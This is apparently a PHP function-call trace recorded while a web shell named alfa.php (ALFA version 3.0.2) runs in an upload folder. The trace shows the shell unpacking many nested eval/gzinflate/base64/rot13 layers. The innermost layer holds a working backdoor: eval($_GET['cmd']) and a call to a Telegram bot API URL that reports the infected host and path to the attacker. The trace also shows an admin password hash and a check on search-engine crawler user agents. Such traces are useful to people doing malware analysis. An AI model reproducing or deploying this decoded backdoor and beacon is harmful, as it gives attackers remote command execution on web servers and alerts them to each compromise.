'DcHJkqIwAADQz2m7OIAExNTUHAybRIMossilCwirCLRAEL5+5r2Mxc2mWKs2b+Ix2yTxkO2kH5qlHc02w/j+eXfjFmy+rr2i55/Atu2r9tp9FBWz4OANpb3DGisYW0RCSmHGx3w+gb10ih/6VSYGeh+tEN5orLSlfOBqN72vkbjoBHj3NgqeKAApE7PB381WIUngVYemYW+P4D5oGNj94BR75Vy4vVBHZKGGYdyD0qTYRubkhcunlS1WEVQj/BpFTg6hr2QlLiI4jnb5+lSkjnrL6dAj5pE7mYoQ9qpE1ANJLMl9Qhsf9Np7g6vDE7WDZ4U1nNvnvDTjpVp8/UZJV2g87zSRSythnvFJyHloToLoevOYXoCC2Lx2BbhMun+JUd36+xxhLsfNI+g9MZT1I+oTP1zO1StYfahFTjnB9nduFX+qtzSCiWpQfHtmw5s7bkfRTGTBuayW65TQzEsrXVPdlaE0OQorpCChonOi0rQvatYAwZtsI4mrBHBDvOO1'
14	55	1	0.013625	2403912
14	55	R			'\r�ɒ�0\000\000��i�8�\004���\034\f�D�(�ȥ\v\b�\b�@\020�~潌�ͦX�6o�1�$��\037��\035�6��yw�\026l��������}\024\025���\r���\032+\030[DBJa��|>��t�\037�U&\006z\037�\020�h���|�j7�����\004x�6\n�(\000)\023����V!I�U��ao��>h\030��\024{�\\��PGd��a܃Ҥ�F��˧�-V\021T#�\032EN\016��d%."8�v��T��z���#�;��\020��D�\003I,�}B\033\037��{���\023��g�5���4�Z|�FIWh<�4�K+a��I�yhN��z�^��ؼv\005�L��Q��\034a.��#�=1��#�\023?\\��+X}�EN9��wn\025��4��jP|{fÛ;nG�Ld�������K+]Sݕ�49\n+� ��s�Ҵ/j�\000��l#��\004pC�����\001'
14	56	0	0.013677	2403112	gzinflate	0		/var/www/html/uploads/alfa.php(11) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code	1	1	'\r�ɒ�0\000\000��i�8�\004���\034\f�D�(�ȥ\v\b�\b�@\020�~潌�ͦX�6o�1�$��\037��\035�6��yw�\026l��������}\024\025���\r���\032+\030[DBJa��|>��t�\037�U&\006z\037�\020�h���|�j7�����\004x�6\n�(\000)\023����V!I�U��ao��>h\030��\024{�\\��PGd��a܃Ҥ�F��˧�-V\021T#�\032EN\016��d%."8�v��T��z���#�;��\020��D�\003I,�}B\033\037��{���\023��g�5���4�Z|�FIWh<�4�K+a��I�yhN��z�^��ؼv\005�L��Q��\034a.��#�=1��#�\023?\\��+X}�EN9��wn\025��4��jP|{fÛ;nG�Ld�������K+]Sݕ�49\n+� ��s�Ҵ/j�\000��l#��\004pC�����\001'
14	56	1	0.013732	2403656
14	56	R			'eval(gzinflate(base64_decode(str_rot13(\'Qp7EfxWNNNQDm6x7CJvWAUshN6JDvgvvy2MMh0wJHfwK384KaYEQ5MFBrHIX9Rda7nh5A+jScTzZ2yEM3UTnZWkBW3cv2esV6wIg443mjXGFN1H3TsDJ3NpsPg87LgSp0jZMydFFFTWhGdJNBGuUXyxn5IviMBjBJmt2+5X9V7ehJgZ9ttNhmxiMjZpIPoBYa/BSuG70XpC4MCAMbI4Sk9NJAEjUr3QP/MCo9L7vl+Spf/4wJyiyVERdMogD//PlZSdi0wwJK0f/9Gu02SUwtcO37Bvwzog3OuEVOaBjnV8fBJ+fJlYWpU2X5EHBpbVXyLimWzV9DZPhu9nqwn7Vuj1dZ9bCFdJRkesr+H1t2Gb50POzISPh9GfhIczcES594uP7vg4Wbd2PKd4u8gjvl30UuNFbaib3+sa6/Dp=\'))));'
14	57	0	0.013769	2404912	eval	1	'eval(gzinflate(base64_decode(str_rot13(\'Qp7EfxWNNNQDm6x7CJvWAUshN6JDvgvvy2MMh0wJHfwK384KaYEQ5MFBrHIX9Rda7nh5A+jScTzZ2yEM3UTnZWkBW3cv2esV6wIg443mjXGFN1H3TsDJ3NpsPg87LgSp0jZMydFFFTWhGdJNBGuUXyxn5IviMBjBJmt2+5X9V7ehJgZ9ttNhmxiMjZpIPoBYa/BSuG70XpC4MCAMbI4Sk9NJAEjUr3QP/MCo9L7vl+Spf/4wJyiyVERdMogD//PlZSdi0wwJK0f/9Gu02SUwtcO37Bvwzog3OuEVOaBjnV8fBJ+fJlYWpU2X5EHBpbVXyLimWzV9DZPhu9nqwn7Vuj1dZ9bCFdJRkesr+H1t2Gb50POzISPh9GfhIczcES594uP7vg4Wbd2PKd4u8gjvl30UuNFbaib3+sa6/Dp=\'))));'	/var/www/html/uploads/alfa.php(11) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code	1	0
15	58	0	0.013795	2404912	str_rot13	0		/var/www/html/uploads/alfa.php(11) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code	1	1	'Qp7EfxWNNNQDm6x7CJvWAUshN6JDvgvvy2MMh0wJHfwK384KaYEQ5MFBrHIX9Rda7nh5A+jScTzZ2yEM3UTnZWkBW3cv2esV6wIg443mjXGFN1H3TsDJ3NpsPg87LgSp0jZMydFFFTWhGdJNBGuUXyxn5IviMBjBJmt2+5X9V7ehJgZ9ttNhmxiMjZpIPoBYa/BSuG70XpC4MCAMbI4Sk9NJAEjUr3QP/MCo9L7vl+Spf/4wJyiyVERdMogD//PlZSdi0wwJK0f/9Gu02SUwtcO37Bvwzog3OuEVOaBjnV8fBJ+fJlYWpU2X5EHBpbVXyLimWzV9DZPhu9nqwn7Vuj1dZ9bCFdJRkesr+H1t2Gb50POzISPh9GfhIczcES594uP7vg4Wbd2PKd4u8gjvl30UuNFbaib3+sa6/Dp='
15	58	1	0.013824	2405456
15	58	R			'Dc7RskJAAADQz6k7PWiJNHfuA6WQitiil2ZZu0jWUsjX384XnLRD5ZSOeUVK9Eqn7au5N+wFpGmM2lRZ3HGaMJxOJ3pi2rfI6jVt443zwKTSA1U3GfQW3AcfCt87YtFc0wMZlqSSSGJuTqWAOThHKlka5VivZOwOWzg2+5K9I7ruWtM9ggAuzkvZwMcVCbOLn/OFhT70KcP4ZPNZoV4Fx9AWNRwHe3DC/ZPb9Y7iy+Fcs/4jWlvlIREqZbtQ//CyMFqv0jjWX0s/9Th02FHjgpB37Oijmbt3BhRIBnOwaI8sOW+sWyLJcH2K5RUOcoIKlYvzJmI9QMCuh9adja7Ihw1qM9oPSqWExrfe+U1g2To50CBmVFCu9TsuVpmpRF594hC7it4Joq2CXq4h8twiy30HhASonvo3+fn6/Qc='
15	59	0	0.013850	2405424	base64_decode	0		/var/www/html/uploads/alfa.php(11) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code	1	1	'Dc7RskJAAADQz6k7PWiJNHfuA6WQitiil2ZZu0jWUsjX384XnLRD5ZSOeUVK9Eqn7au5N+wFpGmM2lRZ3HGaMJxOJ3pi2rfI6jVt443zwKTSA1U3GfQW3AcfCt87YtFc0wMZlqSSSGJuTqWAOThHKlka5VivZOwOWzg2+5K9I7ruWtM9ggAuzkvZwMcVCbOLn/OFhT70KcP4ZPNZoV4Fx9AWNRwHe3DC/ZPb9Y7iy+Fcs/4jWlvlIREqZbtQ//CyMFqv0jjWX0s/9Th02FHjgpB37Oijmbt3BhRIBnOwaI8sOW+sWyLJcH2K5RUOcoIKlYvzJmI9QMCuh9adja7Ihw1qM9oPSqWExrfe+U1g2To50CBmVFCu9TsuVpmpRF594hC7it4Joq2CXq4h8twiy30HhASonvo3+fn6/Qc='
15	59	1	0.013875	2405968
15	59	R			'\r�ѲB@\000\000�ϩ;=h�4w�\003���آ�fY�H�R����\027��C唎yEJ�J��7�\005�i��TY�q�0�N\'zbڷ��5m���\003U7\031�\026�\a\037\n�;b�\\�\003\031���HbnN��98G*Y\032�X�d�\016[86���#��Z�=�\000.�K��\025\t����>�)�d�Y�^\005��\0265\034\a{p�������\\��#Z[�!\021*e�P��0Z��8�_K?�8t�Qゐw�裙�w\006\024H\006s�h�,9o�["�p}��\025\016r�\n���&b=@���֝��ȇ\rj3�\017J��Ʒ�M`�:9� fTP��;.V��D^}�\020���\t���^�!��"�}\a�\004���7����\a'
15	60	0	0.013920	2405424	gzinflate	0		/var/www/html/uploads/alfa.php(11) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code	1	1	'\r�ѲB@\000\000�ϩ;=h�4w�\003���آ�fY�H�R����\027��C唎yEJ�J��7�\005�i��TY�q�0�N\'zbڷ��5m���\003U7\031�\026�\a\037\n�;b�\\�\003\031���HbnN��98G*Y\032�X�d�\016[86���#��Z�=�\000.�K��\025\t����>�)�d�Y�^\005��\0265\034\a{p�������\\��#Z[�!\021*e�P��0Z��8�_K?�8t�Qゐw�裙�w\006\024H\006s�h�,9o�["�p}��\025\016r�\n���&b=@���֝��ȇ\rj3�\017J��Ʒ�M`�:9� fTP��;.V��D^}�\020���\t���^�!��"�}\a�\004���7����\a'
15	60	1	0.013968	2405904
15	60	R			'eval(gzinflate(str_rot13(base64_decode(\'BcHJZYIwAADQz0THg3kanZ51wIUKTygUuGfIgiABT5Ulfn3fcHDOl/dq1RY8f7Elzp95dPxFUzrKlouYgCvsHPN1TU4R75EdN9fXhVSiq4Iaygm5UbOJq+j8W/LEA4pUzxJxLXKmqJpGgdVMRpowy2IF6k3fg3hGXByqljEsQnAqdBt7SeQqULoNAq//ivoNSa+PKLxaT3EoLd2JzocRDIZc35UCOb59dTifaj8q20rYow1a1JpxsP+zP2qxDashgwx6n6XEouYvSrTIJBfMgTbog/6Wpubj9hH6YQpOqUdP6Bv/2J81w5pUaQPjhiSL1Xf18Q8=\'))));'
15	61	0	0.014003	2407224	eval	1	'eval(gzinflate(str_rot13(base64_decode(\'BcHJZYIwAADQz0THg3kanZ51wIUKTygUuGfIgiABT5Ulfn3fcHDOl/dq1RY8f7Elzp95dPxFUzrKlouYgCvsHPN1TU4R75EdN9fXhVSiq4Iaygm5UbOJq+j8W/LEA4pUzxJxLXKmqJpGgdVMRpowy2IF6k3fg3hGXByqljEsQnAqdBt7SeQqULoNAq//ivoNSa+PKLxaT3EoLd2JzocRDIZc35UCOb59dTifaj8q20rYow1a1JpxsP+zP2qxDashgwx6n6XEouYvSrTIJBfMgTbog/6Wpubj9hH6YQpOqUdP6Bv/2J81w5pUaQPjhiSL1Xf18Q8=\'))));'	/var/www/html/uploads/alfa.php(11) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code	1	0
16	62	0	0.014028	2407224	base64_decode	0		/var/www/html/uploads/alfa.php(11) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code	1	1	'BcHJZYIwAADQz0THg3kanZ51wIUKTygUuGfIgiABT5Ulfn3fcHDOl/dq1RY8f7Elzp95dPxFUzrKlouYgCvsHPN1TU4R75EdN9fXhVSiq4Iaygm5UbOJq+j8W/LEA4pUzxJxLXKmqJpGgdVMRpowy2IF6k3fg3hGXByqljEsQnAqdBt7SeQqULoNAq//ivoNSa+PKLxaT3EoLd2JzocRDIZc35UCOb59dTifaj8q20rYow1a1JpxsP+zP2qxDashgwx6n6XEouYvSrTIJBfMgTbog/6Wpubj9hH6YQpOqUdP6Bv/2J81w5pUaQPjhiSL1Xf18Q8='
16	62	1	0.014053	2407640
16	62	R			'\005��e�0\000\000��Dǃy\032��u��\nO(\024�gȂ \001O�%~}�ppΗ�j�\026<�%Οyt�ES:ʖ���+�\034�uMN\021�\0357�ׅT���\032�\t�Q����[��\003�T�\022q-r���F��LF�0�b\005�M߃xF\\\034��1,Bp*t\033{I�*P�\r\002����\rI��(�ZOq(-݉·\021\f�\\ߕ\0029�}u8�j?*�Jأ\rZԚq���?j�\r�!�\fz��Ģ�/J��$\027́6�����\021�a\nN�GO�\033�؟5ÚTi\003�$��w��\017'
16	63	0	0.014093	2407608	str_rot13	0		/var/www/html/uploads/alfa.php(11) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code	1	1	'\005��e�0\000\000��Dǃy\032��u��\nO(\024�gȂ \001O�%~}�ppΗ�j�\026<�%Οyt�ES:ʖ���+�\034�uMN\021�\0357�ׅT���\032�\t�Q����[��\003�T�\022q-r���F��LF�0�b\005�M߃xF\\\034��1,Bp*t\033{I�*P�\r\002����\rI��(�ZOq(-݉·\021\f�\\ߕ\0029�}u8�j?*�Jأ\rZԚq���?j�\r�!�\fz��Ģ�/J��$\027́6�����\021�a\nN�GO�\033�؟5ÚTi\003�$��w��\017'
16	63	1	0.014136	2407960
16	63	R			'\005��r�0\000\000��Qǃl\032��h��\nB(\024�tȂ \001B�%~}�ccΗ�w�\026<�%Οlg�RF:ʖ���+�\034�hZA\021�\0357�ׅG���\032�\t�D����[��\003�G�\022d-e���S��YS�0�o\005�Z߃kS\\\034��1,Oc*g\033{V�*C�\r\002����\rV��(�MBd(-݉·\021\f�\\ߕ\0029�}h8�w?*�Wأ\rMԚd���?w�\r�!�\fm��Ģ�/W��$\027́6�����\021�n\nA�TB�\033�؟5ÚGv\003�$��j��\017'
16	64	0	0.014223	2407544	gzinflate	0		/var/www/html/uploads/alfa.php(11) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code	1	1	'\005��r�0\000\000��Qǃl\032��h��\nB(\024�tȂ \001B�%~}�ccΗ�w�\026<�%Οlg�RF:ʖ���+�\034�hZA\021�\0357�ׅG���\032�\t�D����[��\003�G�\022d-e���S��YS�0�o\005�Z߃kS\\\034��1,Oc*g\033{V�*C�\r\002����\rV��(�MBd(-݉·\021\f�\\ߕ\0029�}h8�w?*�Wأ\rMԚd���?w�\r�!�\fm��Ģ�/W��$\027́6�����\021�n\nA�TB�\033�؟5ÚGv\003�$��j��\017'
16	64	1	0.014266	2407896
16	64	R			'eval(gzinflate(base64_decode(\'Vc7LCoJAFADQfV8REVmLtIlUpoiQkCywRMc2EcM03lTylXN70NdHy7ZndeApimGfb1x20mSZaOfRonPNC+ApIJd1hVChGvYyxEbNDUM0uY5QQNqKUq/b1LjUSOwppZRYhMwdx9v7u4y+g0fRJPE9mllx6W1e8ibNdmdX1kcZCqrEB6VECiuZCeR5shybpkltMpnRAcIbl72u3u3zyA2PbnjSPMYC7h0ipp3/PFqH24DxveO7v/cX\')));'
16	65	0	0.014300	2409792	eval	1	'eval(gzinflate(base64_decode(\'Vc7LCoJAFADQfV8REVmLtIlUpoiQkCywRMc2EcM03lTylXN70NdHy7ZndeApimGfb1x20mSZaOfRonPNC+ApIJd1hVChGvYyxEbNDUM0uY5QQNqKUq/b1LjUSOwppZRYhMwdx9v7u4y+g0fRJPE9mllx6W1e8ibNdmdX1kcZCqrEB6VECiuZCeR5shybpkltMpnRAcIbl72u3u3zyA2PbnjSPMYC7h0ipp3/PFqH24DxveO7v/cX\')));'	/var/www/html/uploads/alfa.php(11) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code	1	0
17	66	0	0.014324	2409792	base64_decode	0		/var/www/html/uploads/alfa.php(11) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code	1	1	'Vc7LCoJAFADQfV8REVmLtIlUpoiQkCywRMc2EcM03lTylXN70NdHy7ZndeApimGfb1x20mSZaOfRonPNC+ApIJd1hVChGvYyxEbNDUM0uY5QQNqKUq/b1LjUSOwppZRYhMwdx9v7u4y+g0fRJPE9mllx6W1e8ibNdmdX1kcZCqrEB6VECiuZCeR5shybpkltMpnRAcIbl72u3u3zyA2PbnjSPMYC7h0ipp3/PFqH24DxveO7v/cX'
17	66	1	0.014348	2410144
17	66	R			'U��\n�@\024\000�}_\021\021Y���T����,�D�6\021�4�T�s{��G˶gu�)�a�o\\v�d�h�Ѣs�\v�) �u�P�\032�2�F�\rC4��P@ڊR��Ը�H�)��X��\035������G�$�=�Yq�m^�&�vgW�G\031\n��\a�D\n+�\t�y�\034��Im2��\001�\033�������\r�nx�<�\002�\035"���<Z�ۀ�㻿�\027'
17	67	0	0.014384	2410112	gzinflate	0		/var/www/html/uploads/alfa.php(11) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code	1	1	'U��\n�@\024\000�}_\021\021Y���T����,�D�6\021�4�T�s{��G˶gu�)�a�o\\v�d�h�Ѣs�\v�) �u�P�\032�2�F�\rC4��P@ڊR��Ը�H�)��X��\035������G�$�=�Yq�m^�&�vgW�G\031\n��\a�D\n+�\t�y�\034��Im2��\001�\033�������\r�nx�<�\002�\035"���<Z�ۀ�㻿�\027'
17	67	1	0.014422	2410400
17	67	R			'eval($_GET[\'cmd\']);\nfile_get_contents("https://api.telegram.org/bot1729991611:AAHNMJh9xPulpdUqS46UmHGwckc5rJ7n6zs/sendMessage?chat_id=-555971049&text=" . $_SERVER[\'HTTP_HOST\'] . $_SERVER[\'SCRIPT_NAME\']);'
17	68	0	0.014460	2411904	eval	1	'eval($_GET[\'cmd\']);\nfile_get_contents("https://api.telegram.org/bot1729991611:AAHNMJh9xPulpdUqS46UmHGwckc5rJ7n6zs/sendMessage?chat_id=-555971049&text=" . $_SERVER[\'HTTP_HOST\'] . $_SERVER[\'SCRIPT_NAME\']);'	/var/www/html/uploads/alfa.php(11) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code	1	0
18	69	0	0.014497	2412128	file_get_contents	0		/var/www/html/uploads/alfa.php(11) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code	2	1	'https://api.telegram.org/bot1729991611:AAHNMJh9xPulpdUqS46UmHGwckc5rJ7n6zs/sendMessage?chat_id=-555971049&text=localhost/uploads/alfa.php'
18	69	1	0.121124	2413984
18	69	R			FALSE
17	68	1	0.121159	2413752
16	65	1	0.121168	2412024
15	61	1	0.121176	2410480
14	57	1	0.121183	2408552
13	52	1	0.121190	2406432
12	49	1	0.121197	2403352
11	45	1	0.121204	2400656
10	41	1	0.121211	2397512
9	39	1	0.121219	2393856
8	35	1	0.121226	2390136
7	30	1	0.121233	2385968
6	26	1	0.121240	2380976
5	22	1	0.121247	2376304
4	17	1	0.121254	2371368
3	13	1	0.121261	2365864
2	9	1	0.121270	2359648
1		A						/var/www/html/uploads/alfa.php	13	$XDmfxOnhck = 'function_exists'
1		A						/var/www/html/uploads/alfa.php	13	$RxPWPyQqTL = 'charCodeAt'
1		A						/var/www/html/uploads/alfa.php	13	$CyvIHOdCHU = 'eval'
1		A						/var/www/html/uploads/alfa.php	13	$jgpUDiTPrk = 'gzinflate'
2	70	0	0.121327	2352408	function_exists	0		/var/www/html/uploads/alfa.php	13	1	'base64_encode'
2	70	1	0.121343	2352448
2	70	R			TRUE
2	71	0	0.121356	2352408	function_exists	0		/var/www/html/uploads/alfa.php	13	1	'base64_decode'
2	71	1	0.121392	2352448
2	71	R			TRUE
1		A						/var/www/html/uploads/alfa.php	13	$gEleJRqGNj = 'create_function'
2	72	0	0.121420	2352472	create_function	0		/var/www/html/uploads/alfa.php	13	2	'$cq'	'eval(gzinflate(QFdAWqZnUX($cq)));'
3	73	0	0.121459	2353752	{internal eval}	1		/var/www/html/uploads/alfa.php	13	0
3	73	1	0.121473	2353752
3	73	R			NULL
2	72	1	0.121487	2353248
2	72	R			'\000lambda_1'
1		A						/var/www/html/uploads/alfa.php	13	$oFcbuslxiL = '\000lambda_1'
2	74	0	0.121514	2353120	session_start	0		/var/www/html/uploads/alfa.php	15	0
2	74	1	0.121576	2353872
2	74	R			TRUE
1		A						/var/www/html/uploads/alfa.php	15	GLOBALS['DB_NAME'] = ['usmfzmlHFCje' => 'admin', 'paLDRhHfAovu' => 'a6f452ec3293d7fb72c5b677257b20ec', 'saEuEgnDlHuL' => '1', 'logXKTfQPNcx' => 'gui', 'shiJVQhUrFkw' => '1', 'pogkUzMiAjqB' => TRUE]
1		A						/var/www/html/uploads/alfa.php	15	$check = FALSE
1		A						/var/www/html/uploads/alfa.php	15	$check = TRUE
2	75	0	0.121640	2353848	print_r	0		/var/www/html/uploads/alfa.php	15	2	['usmfzmlHFCje' => 'admin', 'paLDRhHfAovu' => 'a6f452ec3293d7fb72c5b677257b20ec', 'saEuEgnDlHuL' => '1', 'logXKTfQPNcx' => 'gui', 'shiJVQhUrFkw' => '1', 'pogkUzMiAjqB' => TRUE]	TRUE
2	75	1	0.121665	2354168
2	75	R			'Array\n(\n    [usmfzmlHFCje] => admin\n    [paLDRhHfAovu] => a6f452ec3293d7fb72c5b677257b20ec\n    [saEuEgnDlHuL] => 1\n    [logXKTfQPNcx] => gui\n    [shiJVQhUrFkw] => 1\n    [pogkUzMiAjqB] => 1\n)\n'
2	76	0	0.121691	2354104	md5	0		/var/www/html/uploads/alfa.php	15	1	'Array\n(\n    [usmfzmlHFCje] => admin\n    [paLDRhHfAovu] => a6f452ec3293d7fb72c5b677257b20ec\n    [saEuEgnDlHuL] => 1\n    [logXKTfQPNcx] => gui\n    [shiJVQhUrFkw] => 1\n    [pogkUzMiAjqB] => 1\n)\n'
2	76	1	0.121713	2354200
2	76	R			'ca14352017cac7b631042bd7f2c95b97'
1		A						/var/www/html/uploads/alfa.php	15	_SESSION['alfa_settings_signature'] = 'ca14352017cac7b631042bd7f2c95b97'
1		A						/var/www/html/uploads/alfa.php	15	$key = 'usmfzmlHFCje'
2	77	0	0.121753	2354232	substr	0		/var/www/html/uploads/alfa.php	15	3	'usmfzmlHFCje'	0	2
2	77	1	0.121767	2354360
2	77	R			'us'
1		A						/var/www/html/uploads/alfa.php	15	$prefix = 'us'
1		A						/var/www/html/uploads/alfa.php	15	GLOBALS['DB_NAME']['user'] = 'admin'
1		A						/var/www/html/uploads/alfa.php	15	GLOBALS['DB_NAME']['user_rand'] = 'usmfzmlHFCje'
1		A						/var/www/html/uploads/alfa.php	15	$key = 'paLDRhHfAovu'
2	78	0	0.121827	2354640	substr	0		/var/www/html/uploads/alfa.php	15	3	'paLDRhHfAovu'	0	2
2	78	1	0.121841	2354768
2	78	R			'pa'
1		A						/var/www/html/uploads/alfa.php	15	$prefix = 'pa'
1		A						/var/www/html/uploads/alfa.php	15	GLOBALS['DB_NAME']['pass'] = 'a6f452ec3293d7fb72c5b677257b20ec'
1		A						/var/www/html/uploads/alfa.php	15	GLOBALS['DB_NAME']['pass_rand'] = 'paLDRhHfAovu'
1		A						/var/www/html/uploads/alfa.php	15	$key = 'saEuEgnDlHuL'
2	79	0	0.121901	2354960	substr	0		/var/www/html/uploads/alfa.php	15	3	'saEuEgnDlHuL'	0	2
2	79	1	0.121915	2355088
2	79	R			'sa'
1		A						/var/www/html/uploads/alfa.php	15	$prefix = 'sa'
1		A						/var/www/html/uploads/alfa.php	15	GLOBALS['DB_NAME']['safemode'] = '1'
1		A						/var/www/html/uploads/alfa.php	15	GLOBALS['DB_NAME']['safemode_rand'] = 'saEuEgnDlHuL'
1		A						/var/www/html/uploads/alfa.php	15	$key = 'logXKTfQPNcx'
2	80	0	0.121973	2354960	substr	0		/var/www/html/uploads/alfa.php	15	3	'logXKTfQPNcx'	0	2
2	80	1	0.121986	2355088
2	80	R			'lo'
1		A						/var/www/html/uploads/alfa.php	15	$prefix = 'lo'
1		A						/var/www/html/uploads/alfa.php	15	GLOBALS['DB_NAME']['login_page'] = 'gui'
1		A						/var/www/html/uploads/alfa.php	15	GLOBALS['DB_NAME']['login_page_rand'] = 'logXKTfQPNcx'
1		A						/var/www/html/uploads/alfa.php	15	$key = 'shiJVQhUrFkw'
2	81	0	0.122044	2354960	substr	0		/var/www/html/uploads/alfa.php	15	3	'shiJVQhUrFkw'	0	2
2	81	1	0.122058	2355088
2	81	R			'sh'
1		A						/var/www/html/uploads/alfa.php	15	$prefix = 'sh'
1		A						/var/www/html/uploads/alfa.php	15	GLOBALS['DB_NAME']['show_icons'] = '1'
1		A						/var/www/html/uploads/alfa.php	15	GLOBALS['DB_NAME']['show_icons_rand'] = 'shiJVQhUrFkw'
1		A						/var/www/html/uploads/alfa.php	15	$key = 'pogkUzMiAjqB'
2	82	0	0.122120	2354960	substr	0		/var/www/html/uploads/alfa.php	15	3	'pogkUzMiAjqB'	0	2
2	82	1	0.122134	2355088
2	82	R			'po'
1		A						/var/www/html/uploads/alfa.php	15	$prefix = 'po'
1		A						/var/www/html/uploads/alfa.php	15	GLOBALS['DB_NAME']['post_encryption'] = TRUE
1		A						/var/www/html/uploads/alfa.php	15	GLOBALS['DB_NAME']['post_encryption_rand'] = 'pogkUzMiAjqB'
1		A						/var/www/html/uploads/alfa.php	15	_SESSION['alfa_db_settings'] = ['usmfzmlHFCje' => 'admin', 'paLDRhHfAovu' => 'a6f452ec3293d7fb72c5b677257b20ec', 'saEuEgnDlHuL' => '1', 'logXKTfQPNcx' => 'gui', 'shiJVQhUrFkw' => '1', 'pogkUzMiAjqB' => TRUE, 'user' => 'admin', 'user_rand' => 'usmfzmlHFCje', 'pass' => 'a6f452ec3293d7fb72c5b677257b20ec', 'pass_rand' => 'paLDRhHfAovu', 'safemode' => '1', 'safemode_rand' => 'saEuEgnDlHuL', 'login_page' => 'gui', 'login_page_rand' => 'logXKTfQPNcx', 'show_icons' => '1', 'show_icons_rand' => 'shiJVQhUrFkw', 'post_encryption' => TRUE, 'post_encryption_rand' => 'pogkUzMiAjqB']
1		A						/var/www/html/uploads/alfa.php	18	$userAgents = [0 => 'Google', 1 => 'Slurp', 2 => 'MSNBot', 3 => 'ia_archiver', 4 => 'Yandex', 5 => 'Rambler', 6 => 'bot', 7 => 'spider']
2	83	0	0.122238	2355600	implode	0		/var/www/html/uploads/alfa.php	18	2	'|'	[0 => 'Google', 1 => 'Slurp', 2 => 'MSNBot', 3 => 'ia_archiver', 4 => 'Yandex', 5 => 'Rambler', 6 => 'bot', 7 => 'spider']
2	83	1	0.122298	2355760
2	83	R			'Google|Slurp|MSNBot|ia_archiver|Yandex|Rambler|bot|spider'
2	84	0	0.122317	2355696	preg_match	0		/var/www/html/uploads/alfa.php	18	2	'/Google|Slurp|MSNBot|ia_archiver|Yandex|Rambler|bot|spider/i'	'python-requests/2.25.1'
2	84	1	0.122376	2355760
2	84	R			0
2	85	0	0.122393	2355600	date_default_timezone_set	0		/var/www/html/uploads/alfa.php	25	1	'Asia/Tehran'
2	85	1	0.122410	2355664
2	85	R			TRUE
2	86	0	0.122423	2355616	md5	0		/var/www/html/uploads/alfa.php	26	1	'/var/www/html/uploads/alfa.php'
2	86	1	0.122436	2355712
2	86	R			'96e9c95994dd10d445a4d75f32a5faa1'
2	87	0	0.122450	2355680	define	0		/var/www/html/uploads/alfa.php	26	2	'__ALFA_MD5NAME__'	'96e9c95994dd10d445a4d75f32a5faa1'
2	87	1	0.122465	2355784
2	87	R			TRUE
2	88	0	0.122478	2355712	define	0		/var/www/html/uploads/alfa.php	27	2	'__ALFA_VERSION__'	'3.0.2'
2	88	1	0.122495	2355816
2	88	R			TRUE
2	89	0	0.122511	2355824	define	0		/var/www/html/uploads/alfa.php	28	2	'__LAST_CWD__'	'last_cwd_96e9c95994dd10d445a4d75f32a5faa1'
2	89	1	0.122526	2355928
2	89	R			TRUE
